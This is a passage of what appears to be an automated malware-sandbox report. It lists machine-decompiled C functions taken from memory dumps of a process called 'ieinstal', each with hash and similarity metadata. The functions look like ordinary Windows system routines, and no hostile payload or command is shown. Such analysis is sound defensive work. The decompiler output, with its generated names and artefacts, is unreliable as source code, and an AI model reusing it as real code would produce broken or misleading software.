                        								_v60 =  &_v68;
                        								_v52 = _t73;
                        								_v36 = _t73;
                        								_t74 = _v76;
                        								_v44 =  &_v72;
                        								 *0x1edf8774 = 1;
                        								_v56 = 0;
                        								_v28 = _t74[2];
                        								_v48 = 0;
                        								_v20 = ( *_t74 & 0x0000ffff) + 2;
                        								_v40 = 0;
                        								_v32 = 0;
                        								_v24 = 0;
                        								_v16 = 0;
                        								if(E1ED0B6F0(0x1ecec338, 0x1ecec288, 3,  &_v60) == 0) {
                        									_v80 = _v80 | 0xffffffff;
                        									_push( &_v84);
                        									_push(0);
                        									_push(_v64);
                        									_v84 = 0xfa0a1f00;
                        									E1ED49520();
                        								}
                        							}
                        						}
                        					}
                        				}
                        				if(_v64 != 0) {
                        					_push(_v64);
                        					E1ED495D0();
                        					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                        					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                        				}
                        				if(_t77 != 0) {
                        					E1ED1FFB0(_t68, _t77, 0x1edf8778);
                        				}
                        				_pop(_t78);
                        				return E1ED4B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                        			}

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 080b6066d76331b9ba42d7f86a75b40cf05d0c4f0669900cc0d3fab93d27104a
                        • Instruction ID: 972fc8e6ce12cfed538d380f59734e822f817fc32dac556efc44b193e3793c6f
                        • Opcode Fuzzy Hash: 080b6066d76331b9ba42d7f86a75b40cf05d0c4f0669900cc0d3fab93d27104a
                        • Instruction Fuzzy Hash: BC41A2B5D00248AFDB14CFA5D940BFEFBF5EF48314F14862AE925A7240DB70A906CB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 85%
                        			E1ED05210(intOrPtr _a4, void* _a8) {
                        				void* __ecx;
                        				intOrPtr _t31;
                        				signed int _t32;
                        				signed int _t33;
                        				intOrPtr _t35;
                        				signed int _t52;
                        				void* _t54;
                        				void* _t56;
                        				unsigned int _t59;
                        				signed int _t60;
                        				void* _t61;
                        
                        				_t61 = E1ED052A5(1);
                        				if(_t61 == 0) {
                        					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                        					_t54 =  *((intOrPtr*)(_t31 + 0x28));
                        					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
                        				} else {
                        					_t54 =  *((intOrPtr*)(_t61 + 0x10));
                        					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
                        				}
                        				_t60 = _t59 >> 1;
                        				_t32 = 0x3a;
                        				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
                        					_t52 = _t60 + _t60;
                        					if(_a4 > _t52) {
                        						goto L5;
                        					}
                        					if(_t61 != 0) {
                        						asm("lock xadd [esi], eax");
                        						if((_t32 | 0xffffffff) == 0) {
                        							_push( *((intOrPtr*)(_t61 + 4)));
                        							E1ED495D0();
                        							L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                        						}
                        					} else {
                        						E1ED1EB70(_t54, 0x1edf79a0);
                        					}
                        					_t26 = _t52 + 2; // 0xddeeddf0
                        					return _t26;
                        				} else {
                        					_t52 = _t60 + _t60;
                        					if(_a4 < _t52) {
                        						if(_t61 != 0) {
                        							asm("lock xadd [esi], eax");
                        							if((_t32 | 0xffffffff) == 0) {
                        								_push( *((intOrPtr*)(_t61 + 4)));
                        								E1ED495D0();
                        								L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                        							}
                        						} else {
                        							E1ED1EB70(_t54, 0x1edf79a0);
                        						}
                        						return _t52;
                        					}
                        					L5:
                        					_t33 = E1ED4F3E0(_a8, _t54, _t52);
                        					if(_t61 == 0) {
                        						E1ED1EB70(_t54, 0x1edf79a0);
                        					} else {
                        						asm("lock xadd [esi], eax");
                        						if((_t33 | 0xffffffff) == 0) {
                        							_push( *((intOrPtr*)(_t61 + 4)));
                        							E1ED495D0();
                        							L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                        						}
                        					}
                        					_t35 = _a8;
                        					if(_t60 <= 1) {
                        						L9:
                        						_t60 = _t60 - 1;
                        						 *((short*)(_t52 + _t35 - 2)) = 0;
                        						goto L10;
                        					} else {
                        						_t56 = 0x3a;
                        						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
                        							 *((short*)(_t52 + _t35)) = 0;
                        							L10:
                        							return _t60 + _t60;
                        						}
                        						goto L9;
                        					}
                        				}
                        			}















                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f0b78165f53bd4a5b969d2fa269c4b9d1cde25eba5df68b6b6907a6ae04a1ad6
                        • Instruction ID: 4ad45ec8471b3aeea0e3be749b6f34adc3fc6aa0fc72100ed3ff3310e497f1d2
                        • Opcode Fuzzy Hash: f0b78165f53bd4a5b969d2fa269c4b9d1cde25eba5df68b6b6907a6ae04a1ad6
                        • Instruction Fuzzy Hash: 05310831511652EBC7328B69CD40B567776FF14760F564B2AE8554B9E0D770F800CBE0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E1ED3A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                        				intOrPtr _t35;
                        				intOrPtr _t39;
                        				intOrPtr _t45;
                        				intOrPtr* _t51;
                        				intOrPtr* _t52;
                        				intOrPtr* _t55;
                        				signed int _t57;
                        				intOrPtr* _t59;
                        				intOrPtr _t68;
                        				intOrPtr* _t77;
                        				void* _t79;
                        				signed int _t80;
                        				intOrPtr _t81;
                        				char* _t82;
                        				void* _t83;
                        
                        				_push(0x24);
                        				_push(0x1ede0220);
                        				E1ED5D08C(__ebx, __edi, __esi);
                        				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
                        				_t79 = __ecx;
                        				_t35 =  *0x1edf7b9c; // 0x0
                        				_t55 = L1ED24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
                        				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
                        				if(_t55 == 0) {
                        					_t39 = 0xc0000017;
                        					L11:
                        					return E1ED5D0D1(_t39);
                        				}
                        				_t68 = 0;
                        				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
                        				 *(_t83 - 4) =  *(_t83 - 4) & 0;
                        				_t7 = _t55 + 8; // 0x8
                        				_t57 = 6;
                        				memcpy(_t7, _t79, _t57 << 2);
                        				_t80 = 0xfffffffe;
                        				 *(_t83 - 4) = _t80;
                        				if(0 < 0) {
                        					L14:
                        					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                        					L20:
                        					L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
                        					_t39 = _t81;
                        					goto L11;
                        				}
                        				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
                        					_t81 = 0xc000007b;
                        					goto L20;
                        				}
                        				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
                        					_t59 =  *((intOrPtr*)(_t83 + 8));
                        					_t45 =  *_t59;
                        					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
                        					 *_t59 = _t45 + 1;
                        					L6:
                        					 *(_t83 - 4) = 1;
                        					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
                        					 *(_t83 - 4) = _t80;
                        					if(_t68 < 0) {
                        						_t82 =  *((intOrPtr*)(_t83 + 0xc));
                        						if(_t82 == 0) {
                        							goto L14;
                        						}
                        						asm("btr eax, ecx");
                        						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                        						if( *_t82 != 0) {
                        							 *0x1edf7b10 =  *0x1edf7b10 - 8;
                        						}
                        						goto L20;
                        					}
                        					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
                        					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
                        					_t51 =  *0x1edf536c; // 0x3026338
                        					if( *_t51 != 0x1edf5368) {
                        						_push(3);
                        						asm("int 0x29");
                        						goto L14;
                        					}
                        					 *_t55 = 0x1edf5368;
                        					 *((intOrPtr*)(_t55 + 4)) = _t51;
                        					 *_t51 = _t55;
                        					 *0x1edf536c = _t55;
                        					_t52 =  *((intOrPtr*)(_t83 + 0x10));
                        					if(_t52 != 0) {
                        						 *_t52 = _t55;
                        					}
                        					_t39 = 0;
                        					goto L11;
                        				}
                        				_t77 =  *((intOrPtr*)(_t83 + 8));
                        				_t68 = E1ED3A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
                        				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
                        				if(_t68 < 0) {
                        					goto L14;
                        				}
                        				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
                        				goto L6;
                        			}



















                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: aa29d01363c6034563c4b825c4b9505f62fb47a42bc1495593e49249bac86d11
                        • Instruction ID: 61d423d2363920633ce16aec1052641582e084d7bf6f3295ed6d3a70f25f8611
                        • Opcode Fuzzy Hash: aa29d01363c6034563c4b825c4b9505f62fb47a42bc1495593e49249bac86d11
                        • Instruction Fuzzy Hash: 1A414BB5E10255DFCB05CF59C990B99BBF2BF49305F2A8269E808AB344D774AD42CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E1ED43D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                        				intOrPtr _v8;
                        				char _v12;
                        				signed short** _t33;
                        				short* _t38;
                        				intOrPtr* _t39;
                        				intOrPtr* _t41;
                        				signed short _t43;
                        				intOrPtr* _t47;
                        				intOrPtr* _t53;
                        				signed short _t57;
                        				intOrPtr _t58;
                        				signed short _t60;
                        				signed short* _t61;
                        
                        				_t47 = __ecx;
                        				_t61 = __edx;
                        				_t60 = ( *__ecx & 0x0000ffff) + 2;
                        				if(_t60 > 0xfffe) {
                        					L22:
                        					return 0xc0000106;
                        				}
                        				if(__edx != 0) {
                        					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                        						L5:
                        						E1ED17B60(0, _t61, 0x1ece11c4);
                        						_v12 =  *_t47;
                        						_v12 = _v12 + 0xfff8;
                        						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                        						E1ED17B60(0xfff8, _t61,  &_v12);
                        						_t33 = _a8;
                        						if(_t33 != 0) {
                        							 *_t33 = _t61;
                        						}
                        						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                        						_t53 = _a12;
                        						if(_t53 != 0) {
                        							_t57 = _t61[2];
                        							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                        							while(_t38 >= _t57) {
                        								if( *_t38 == 0x5c) {
                        									_t41 = _t38 + 2;
                        									if(_t41 == 0) {
                        										break;
                        									}
                        									_t58 = 0;
                        									if( *_t41 == 0) {
                        										L19:
                        										 *_t53 = _t58;
                        										goto L7;
                        									}
                        									 *_t53 = _t41;
                        									goto L7;
                        								}
                        								_t38 = _t38 - 2;
                        							}
                        							_t58 = 0;
                        							goto L19;
                        						} else {
                        							L7:
                        							_t39 = _a16;
                        							if(_t39 != 0) {
                        								 *_t39 = 0;
                        								 *((intOrPtr*)(_t39 + 4)) = 0;
                        								 *((intOrPtr*)(_t39 + 8)) = 0;
                        								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                        							}
                        							return 0;
                        						}
                        					}
                        					_t61 = _a4;
                        					if(_t61 != 0) {
                        						L3:
                        						_t43 = L1ED24620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                        						_t61[2] = _t43;
                        						if(_t43 == 0) {
                        							return 0xc0000017;
                        						}
                        						_t61[1] = _t60;
                        						 *_t61 = 0;
                        						goto L5;
                        					}
                        					goto L22;
                        				}
                        				_t61 = _a4;
                        				if(_t61 == 0) {
                        					return 0xc000000d;
                        				}
                        				goto L3;
                        			}

















                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 539d1700c87a18fbfdeab17cde4f86092904adb4b9317b15f2e8d98aa9f91ba1
                        • Instruction ID: eed80b81811007a56cf00df5a81fb9b4247abf08d90b58ab00515ab23d7cc59b
                        • Opcode Fuzzy Hash: 539d1700c87a18fbfdeab17cde4f86092904adb4b9317b15f2e8d98aa9f91ba1
                        • Instruction Fuzzy Hash: BA31D431A01655DBC724DF2ED841A6BBBF2EF65700725827EE885CBB50EB30D840C790
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 76%
                        			E1ED87016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                        				signed int _v8;
                        				char _v588;
                        				intOrPtr _v592;
                        				intOrPtr _v596;
                        				signed short* _v600;
                        				char _v604;
                        				short _v606;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed short* _t55;
                        				void* _t56;
                        				signed short* _t58;
                        				signed char* _t61;
                        				char* _t68;
                        				void* _t69;
                        				void* _t71;
                        				void* _t72;
                        				signed int _t75;
                        
                        				_t64 = __edx;
                        				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                        				_v8 =  *0x1edfd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                        				_t55 = _a16;
                        				_v606 = __ecx;
                        				_t71 = 0;
                        				_t58 = _a12;
                        				_v596 = __edx;
                        				_v600 = _t58;
                        				_t68 =  &_v588;
                        				if(_t58 != 0) {
                        					_t71 = ( *_t58 & 0x0000ffff) + 2;
                        					if(_t55 != 0) {
                        						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                        					}
                        				}
                        				_t8 = _t71 + 0x2a; // 0x28
                        				_t33 = _t8;
                        				_v592 = _t8;
                        				if(_t71 <= 0x214) {
                        					L6:
                        					 *((short*)(_t68 + 6)) = _v606;
                        					if(_t64 != 0xffffffff) {
                        						asm("cdq");
                        						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                        						 *((char*)(_t68 + 0x28)) = _a4;
                        						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                        						 *((char*)(_t68 + 0x29)) = _a8;
                        						if(_t71 != 0) {
                        							_t22 = _t68 + 0x2a; // 0x2a
                        							_t64 = _t22;
                        							E1ED86B4C(_t58, _t22, _t71,  &_v604);
                        							if(_t55 != 0) {
                        								_t25 = _v604 + 0x2a; // 0x2a
                        								_t64 = _t25 + _t68;
                        								E1ED86B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                        							}
                        							if(E1ED27D50() == 0) {
                        								_t61 = 0x7ffe0384;
                        							} else {
                        								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        							}
                        							_push(_t68);
                        							_push(_v592 + 0xffffffe0);
                        							_push(0x402);
                        							_push( *_t61 & 0x000000ff);
                        							E1ED49AE0();
                        						}
                        					}
                        					_t35 =  &_v588;
                        					if( &_v588 != _t68) {
                        						_t35 = L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                        					}
                        					L16:
                        					_pop(_t69);
                        					_pop(_t72);
                        					_pop(_t56);
                        					return E1ED4B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                        				}
                        				_t68 = L1ED24620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                        				if(_t68 == 0) {
                        					goto L16;
                        				} else {
                        					_t58 = _v600;
                        					_t64 = _v596;
                        					goto L6;
                        				}
                        			}























                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5cb6a57140ba9c1c429d27180206e62ead63ca44a2f3f26166f8214e9aa37ab1
                        • Instruction ID: 24ab8a8aafbc412800aa0fd5f8edd6e3cb6740fadb4fc79c4a9604cc91e423b6
                        • Opcode Fuzzy Hash: 5cb6a57140ba9c1c429d27180206e62ead63ca44a2f3f26166f8214e9aa37ab1
                        • Instruction Fuzzy Hash: 113192766047919BC310CF28C951E6AB7F5BF88700F014B29F895D7A90E730E914C7A5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 68%
                        			E1ED2C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                        				signed int* _v8;
                        				char _v16;
                        				void* __ebx;
                        				void* __edi;
                        				signed char _t33;
                        				signed char _t43;
                        				signed char _t48;
                        				signed char _t62;
                        				void* _t63;
                        				intOrPtr _t69;
                        				intOrPtr _t71;
                        				unsigned int* _t82;
                        				void* _t83;
                        
                        				_t80 = __ecx;
                        				_t82 = __edx;
                        				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                        				_t62 = _t33 >> 0x00000001 & 0x00000001;
                        				if((_t33 & 0x00000001) != 0) {
                        					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                        					if(E1ED27D50() != 0) {
                        						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        					} else {
                        						_t43 = 0x7ffe0386;
                        					}
                        					if( *_t43 != 0) {
                        						_t43 = E1EDD8D34(_v8, _t80);
                        					}
                        					E1ED22280(_t43, _t82);
                        					if( *((char*)(_t80 + 0xdc)) == 0) {
                        						E1ED1FFB0(_t62, _t80, _t82);
                        						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                        						_t30 = _t80 + 0xd0; // 0xd0
                        						_t83 = _t30;
                        						E1EDD8833(_t83,  &_v16);
                        						_t81 = _t80 + 0x90;
                        						E1ED1FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                        						_t63 = 0;
                        						_push(0);
                        						_push(_t83);
                        						_t48 = E1ED4B180();
                        						if(_a4 != 0) {
                        							E1ED22280(_t48, _t81);
                        						}
                        					} else {
                        						_t69 = _v8;
                        						_t12 = _t80 + 0x98; // 0x98
                        						_t13 = _t69 + 0xc; // 0x575651ff
                        						E1ED2BB2D(_t13, _t12);
                        						_t71 = _v8;
                        						_t15 = _t80 + 0xb0; // 0xb0
                        						_t16 = _t71 + 8; // 0x8b000cc2
                        						E1ED2BB2D(_t16, _t15);
                        						E1ED2B944(_v8, _t62);
                        						 *((char*)(_t80 + 0xdc)) = 0;
                        						E1ED1FFB0(0, _t80, _t82);
                        						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                        						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                        						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                        						 *(_t80 + 0xde) = 0;
                        						if(_a4 == 0) {
                        							_t25 = _t80 + 0x90; // 0x90
                        							E1ED1FFB0(0, _t80, _t25);
                        						}
                        						_t63 = 1;
                        					}
                        					return _t63;
                        				}
                        				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                        				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                        				if(_a4 == 0) {
                        					_t24 = _t80 + 0x90; // 0x90
                        					E1ED1FFB0(0, __ecx, _t24);
                        				}
                        				return 0;
                        			}

















                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                        • Instruction ID: 652d0751b36549b90b980ee84cf7c7899b6d477a1b4862a5715df87fd7e13a82
                        • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                        • Instruction Fuzzy Hash: E7314675A016C7AFD709CBF0C480BDAF755BF42208F44476AD01C4B280CB75AA49D7B1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 86%
                        			E1ED46DE6(signed int __ecx, void* __edx, signed int _a4, intOrPtr* _a8, intOrPtr* _a12) {
                        				intOrPtr _v8;
                        				intOrPtr _t39;
                        				intOrPtr _t52;
                        				intOrPtr _t53;
                        				signed int _t59;
                        				signed int _t63;
                        				intOrPtr _t64;
                        				intOrPtr* _t66;
                        				void* _t68;
                        				intOrPtr _t69;
                        				signed int _t73;
                        				signed int _t75;
                        				intOrPtr _t77;
                        				signed int _t80;
                        				intOrPtr _t82;
                        
                        				_t68 = __edx;
                        				_push(__ecx);
                        				_t80 = __ecx;
                        				_t75 = _a4;
                        				if(__edx >  *((intOrPtr*)(__ecx + 0x90))) {
                        					L23:
                        					asm("lock inc dword [esi+0x110]");
                        					if(( *(_t80 + 0xd4) & 0x00010000) != 0) {
                        						asm("lock inc dword [ecx+eax+0x4]");
                        					}
                        					_t39 = 0;
                        					L13:
                        					return _t39;
                        				}
                        				_t63 =  *(__ecx + 0x88);
                        				_t4 = _t68 + 7; // 0xa
                        				_t69 =  *((intOrPtr*)(__ecx + 0x8c));
                        				_t59 = _t4 & 0xfffffff8;
                        				_v8 = _t69;
                        				if(_t75 >= _t63) {
                        					_t75 = _t75 % _t63;
                        					L15:
                        					_t69 = _v8;
                        				}
                        				_t64 =  *((intOrPtr*)(_t80 + 0x17c + _t75 * 4));
                        				if(_t64 == 0) {
                        					L14:
                        					if(E1ED46EBE(_t80, _t64, _t75) != 1) {
                        						goto L23;
                        					}
                        					goto L15;
                        				}
                        				asm("lock inc dword [ecx+0xc]");
                        				if( *((intOrPtr*)(_t64 + 0x2c)) != 1 ||  *((intOrPtr*)(_t64 + 8)) > _t69) {
                        					goto L14;
                        				} else {
                        					_t73 = _t59;
                        					asm("lock xadd [eax], edx");
                        					if(_t73 + _t59 > _v8) {
                        						if(_t73 <= _v8) {
                        							 *(_t64 + 4) = _t73;
                        						}
                        						goto L14;
                        					}
                        					_t77 = _t73 + _t64;
                        					_v8 = _t77;
                        					 *_a12 = _t64;
                        					_t66 = _a8;
                        					if(_t66 == 0) {
                        						L12:
                        						_t39 = _t77;
                        						goto L13;
                        					}
                        					_t52 =  *((intOrPtr*)(_t80 + 0x10));
                        					if(_t52 != 0) {
                        						_t53 = _t52 - 1;
                        						if(_t53 == 0) {
                        							asm("rdtsc");
                        							 *_t66 = _t53;
                        							L11:
                        							 *(_t66 + 4) = _t73;
                        							goto L12;
                        						}
                        						E1ED36A60(_t66);
                        						goto L12;
                        					}
                        					while(1) {
                        						_t73 =  *0x7ffe0018;
                        						_t82 =  *0x7FFE0014;
                        						if(_t73 ==  *0x7FFE001C) {
                        							break;
                        						}
                        						asm("pause");
                        					}
                        					_t66 = _a8;
                        					_t77 = _v8;
                        					 *_t66 = _t82;
                        					goto L11;
                        				}
                        			}



















                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8f5923ccfc62e11761a64181f477a9fcd764954153fe337c5a9bd4bea8846838
                        • Instruction ID: 74be42f99f1f44f2de04c01673c4624261960783d99c97afcd93e9495ebc8b58
                        • Opcode Fuzzy Hash: 8f5923ccfc62e11761a64181f477a9fcd764954153fe337c5a9bd4bea8846838
                        • Instruction Fuzzy Hash: 2131B230204205DFD714CF29C490A9AB7E6FFD5315B24CA6EE46A8B659DB31F806CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 92%
                        			E1ED3A70E(intOrPtr* __ecx, char* __edx) {
                        				unsigned int _v8;
                        				intOrPtr* _v12;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* _t16;
                        				intOrPtr _t17;
                        				intOrPtr _t28;
                        				char* _t33;
                        				intOrPtr _t37;
                        				intOrPtr _t38;
                        				void* _t50;
                        				intOrPtr _t52;
                        
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t52 =  *0x1edf7b10; // 0x10
                        				_t33 = __edx;
                        				_t48 = __ecx;
                        				_v12 = __ecx;
                        				if(_t52 == 0) {
                        					 *0x1edf7b10 = 8;
                        					 *0x1edf7b14 = 0x1edf7b0c;
                        					 *0x1edf7b18 = 1;
                        					L6:
                        					_t2 = _t52 + 1; // 0x11
                        					E1ED3A990(0x1edf7b10, _t2, 7);
                        					asm("bts ecx, eax");
                        					 *_t48 = _t52;
                        					 *_t33 = 1;
                        					L3:
                        					_t16 = 0;
                        					L4:
                        					return _t16;
                        				}
                        				_t17 = L1ED3A840(__edx, __ecx, __ecx, _t52, 0x1edf7b10, 1, 0);
                        				if(_t17 == 0xffffffff) {
                        					_t37 =  *0x1edf7b10; // 0x10
                        					_t3 = _t37 + 0x27; // 0x37
                        					__eflags = _t3 >> 5 -  *0x1edf7b18; // 0x1
                        					if(__eflags > 0) {
                        						_t38 =  *0x1edf7b9c; // 0x0
                        						_t4 = _t52 + 0x27; // 0x37
                        						_v8 = _t4 >> 5;
                        						_t50 = L1ED24620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
                        						__eflags = _t50;
                        						if(_t50 == 0) {
                        							_t16 = 0xc0000017;
                        							goto L4;
                        						}
                        						 *0x1edf7b18 = _v8;
                        						_t8 = _t52 + 7; // 0x17
                        						E1ED4F3E0(_t50,  *0x1edf7b14, _t8 >> 3);
                        						_t28 =  *0x1edf7b14; // 0x77f07b0c
                        						__eflags = _t28 - 0x1edf7b0c;
                        						if(_t28 != 0x1edf7b0c) {
                        							L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                        						}
                        						_t9 = _t52 + 8; // 0x18
                        						 *0x1edf7b14 = _t50;
                        						_t48 = _v12;
                        						 *0x1edf7b10 = _t9;
                        						goto L6;
                        					}
                        					 *0x1edf7b10 = _t37 + 8;
                        					goto L6;
                        				}
                        				 *__ecx = _t17;
                        				 *_t33 = 0;
                        				goto L3;
                        			}

















                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2276a8feffa9e32f57fb9dc1f50fd09e5e37187295597ff9ec311cf8ddaabefe
                        • Instruction ID: e197dedd77d3c15bf9f91a8775eaf2ccb5c341cdd2621f20e5654f99954e6670
                        • Opcode Fuzzy Hash: 2276a8feffa9e32f57fb9dc1f50fd09e5e37187295597ff9ec311cf8ddaabefe
                        • Instruction Fuzzy Hash: D931A2F1B20251ABC711CF18C8E0F9577F9EB86710F260A59E056C7240D7B0A903CBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

